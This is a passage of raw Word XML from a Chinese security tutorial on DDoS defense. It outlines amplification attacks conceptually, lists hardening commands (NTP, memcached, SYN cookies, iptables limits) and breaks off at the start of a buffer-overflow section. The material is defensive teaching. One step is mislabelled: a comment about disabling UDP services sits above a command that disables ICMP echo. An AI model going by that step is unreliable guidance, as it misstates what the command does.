        </w:rPr>
        <w:t>网络防护：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5599A5" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流量清洗设备（识别并过滤恶意流量）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF42807" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BGP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黑洞路由（将攻击流量导向</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黑洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B0939F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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>云端防护：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181C1700" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分流：将流量分散到全球节点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AB257C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>云清洗中心：阿里云</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防护</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/Cloudflare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C9A84A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>弹性带宽：攻击时自动扩容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B49F918" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>放大攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE6023C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攻击原理（三步曲）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F07C94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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪造源</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：将攻击目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设为数据包源</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E8303B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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发放大器：向开放服务器发送小请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578F01A7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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放大攻击：服务器向目标返回大响应（放大倍数可达</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>50,000%</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243F42AE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防御措施：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EDCCFA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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源验证：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DD5C67" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BCP38</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（过滤伪造源</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212E9D22" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络入口过滤（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ISP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实施）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144EE04B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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭放大器：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FF66E7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>&lt;BASH&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B7499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 xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>放大漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2554F2C4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 xml:space="preserve">ntp.conf </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>添加</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: restrict default noquery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F2133B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 xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Memcached</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>外网访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD8A9F4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>memcached -d -l 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FCE895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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>云端防护：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12736809" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阿里云</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高防</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>级防护）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706AD4D1" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AWS Shield Advanced</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（自动缓解）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7354EE" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>基础防护五件套</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8E03CE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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYN Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F34CB67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>&lt;BASH&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376C18E4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># Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>系统启用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4903C0F0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>echo 1 &gt; /proc/sys/net/ipv4/tcp_syncookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300D966C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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>配置连接限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145081E8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>&lt;BASH&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F945E7F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 xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>限制单个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>最大连接数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FA1756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>iptables -A INPUT -p tcp --syn --dport 80 -m connlimit --connlimit-above 50 -j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5E18FA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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>设置速率阈值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F12DC1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>&lt;BASH&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D74ED33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 xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>每秒最多</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>个新连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BC9E30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>iptables -A INPUT -p tcp --syn -m limit --limit 20/s -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140D5734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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>关闭不必要服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED72F78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>&lt;BASH&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0044F6AC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 xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>禁用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>小服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B7E36C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>sysctl -w net.ipv4.icmp_echo_ignore_all=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599C9641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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>启用黑名单自动更新</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673D12C1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>&lt;BASH&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D055978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 xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FireHOL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>维护</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>黑名单</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414624E3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>apt install firehol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B01FF91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>firehol update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B6351E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>缓冲区溢出攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272098C4" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>缓冲区溢出攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28915B04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攻击原理（内存越界操作）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5D6AB0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lastRenderedPageBreak/>
        <w:t>原理（就像往杯子里倒水）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D2D1A7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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么是缓冲区：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C1ED47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程序运行时存放数据的临时区域（想象成容量固定的杯子）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B88F23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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>溢出如何发生：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24582375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程序员未检查输入数据长度（如允许输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符，但缓冲区只能装</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64550F00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攻击者输入超长数据（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
